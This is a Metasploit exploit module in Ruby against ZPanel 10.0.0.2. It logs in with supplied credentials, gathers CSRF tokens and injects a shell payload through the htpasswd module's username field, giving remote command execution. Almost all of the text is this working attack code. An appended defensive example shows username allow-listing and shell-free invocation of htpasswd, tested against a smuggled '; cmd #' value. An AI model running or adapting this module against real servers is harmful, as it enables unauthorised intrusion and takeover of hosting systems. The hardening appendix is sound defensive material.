ZPanel 10.0.0.2 htpasswd Module Username Command Execution
Source: metasploit.com  Author: sinn3r  Published: 2013-06-24
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "ZPanel 10.0.0.2 htpasswd Module Username Command Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in ZPanel's htpasswd module. When
        creating .htaccess using the htpasswd module, the username field can be used to
        inject system commands, which is passed on to a system() function for executing
        the system's htpasswd's command.
  
        Please note: In order to use this module, you must have a valid account to login
        to ZPanel.  An account part of any of the default groups should suffice, such as:
        Administrators, Resellers, or Users (Clients).  By default, there's already a
        'zadmin' user, but the password is randomly generated.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'shachibista',  # Original discovery
          'sinn3r'        # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '94038'],
        ],
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Targets'        =>
        [
          [ 'ZPanel 10.0.0.2 on Linux', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 7 2013",
      'DefaultTarget'  => 0))
  
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ZPanel', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end
  
  
  def peer
    "#{rhost}:#{rport}"
  end
  
  
  def check
    res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end
  
    if res.body =~ /This server is running: ZPanel/
      return Exploit::CheckCode::Detected
    end
  
    return Exploit::CheckCode::Safe
  end
  
  
  def login(base, token, cookie)
    res  = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(base, 'index.php'),
      'cookie'    => cookie,
      'vars_post' => {
        'inUsername' => datastore['USERNAME'],
        'inPassword' => datastore['PASSWORD'],
        'sublogin2'  => 'LogIn',
        'csfr_token' => token
      }
    })
  
    if not res
      fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out")
    elsif res.body =~ /Application Error/ or res.headers['location'].to_s =~ /invalidlogin/
      fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
    end
  
    res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || ''
  end
  
  
  def get_csfr_info(base, path='index.php', cookie='', vars={})
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(base),
      'cookie'   => cookie,
      'vars_get' => vars
    })
  
    fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res
  
    token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || ''
    sid   = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || ''
    fail_with(Exploit::Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty?
  
    return token, sid
  end
  
  
  def exec(base, token, sid, user_salt_cookie)
    fake_pass = Rex::Text.rand_text_alpha(5)
    cookie    = "#{sid}; #{user_salt_cookie}"
  
    send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(base),
      'cookie'   => cookie,
      'vars_get' => {
        'module' => 'htpasswd',
        'action' => 'CreateHTA'
      },
      'vars_post' => {
        'inAuthName'          => 'Restricted+Area',
        'inHTUsername'        => ";#{payload.encoded} #",
        'inHTPassword'        => fake_pass,
        'inConfirmHTPassword' => fake_pass,
        'inPath'              => '/',
        'csfr_token'          => token
      }
    })
  end
  
  
  def exploit
    base = target_uri.path
  
    token, sid = get_csfr_info(base)
    vprint_status("#{peer} - Token=#{token}, SID=#{sid}")
  
    user_salt_cookie = login(base, token, sid)
    print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
  
    vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'}
    cookie = "#{sid}; #{user_salt_cookie}"
    token = get_csfr_info(base, '', cookie, vars)[0]
    vprint_status("#{peer} - Token=#{token}, SID=#{sid}")
  
  
    print_status("#{peer} - Executing payload...")
    exec(base, token, sid, user_salt_cookie)
  end
  
end
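As an added hardening example (not code from the Metasploit module above, nor from ZPanel): the htpasswd module's flaw is that the submitted username ends up inside a shell command string handed to system(). The Ruby below shows the defensive counterpart, an allow-list check on the username plus an argument-vector invocation of htpasswd that never passes through a shell. The allowed character set and the length limit are assumptions, not ZPanel's rules.

```ruby
# Added example, not part of ZPanel or the Metasploit module: hardened
# construction of the htpasswd call versus the naive string-building pattern.
# Nothing in this file executes a command; it only builds and checks arguments.

# Allow-list for htpasswd usernames: letters, digits, dot, underscore, hyphen,
# 1-32 chars. Assumed limits; a colon is excluded because it separates fields
# in .htpasswd, and every shell metacharacter is excluded by construction.
HTUSER_RE = /\A[A-Za-z0-9._-]{1,32}\z/

class UnsafeUsername < StandardError; end

# True when the username matches the allow-list exactly.
def valid_htuser?(user)
  user.is_a?(String) && HTUSER_RE.match?(user)
end

# Argument vector for `htpasswd -b <file> <user> <pass>`. Passed as separate
# arguments to Kernel#system or Process.spawn, Ruby execs htpasswd directly
# without /bin/sh, so ';', '#', '$(...)' in any argument stay literal.
def build_htpasswd_argv(htpasswd_file, user, pass)
  raise UnsafeUsername, "rejected username #{user.inspect}" unless valid_htuser?(user)
  raise ArgumentError, "password must not be empty" if pass.to_s.empty?
  ["htpasswd", "-b", htpasswd_file, user, pass]
end

# For comparison only: the single string a naive implementation would give to
# the shell. Shown so the injection point is visible; never run it.
def naive_shell_command(htpasswd_file, user, pass)
  "htpasswd -b #{htpasswd_file} #{user} #{pass}"
end

if __FILE__ == $0
  p build_htpasswd_argv("/var/www/site/.htpasswd", "alice", "s3cret")
  begin
    # Constructed input shaped like the module's ";<command> #" username.
    build_htpasswd_argv("/var/www/site/.htpasswd", "; cmd #", "x")
  rescue UnsafeUsername => e
    puts "blocked: #{e.message}"
  end
end
```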

 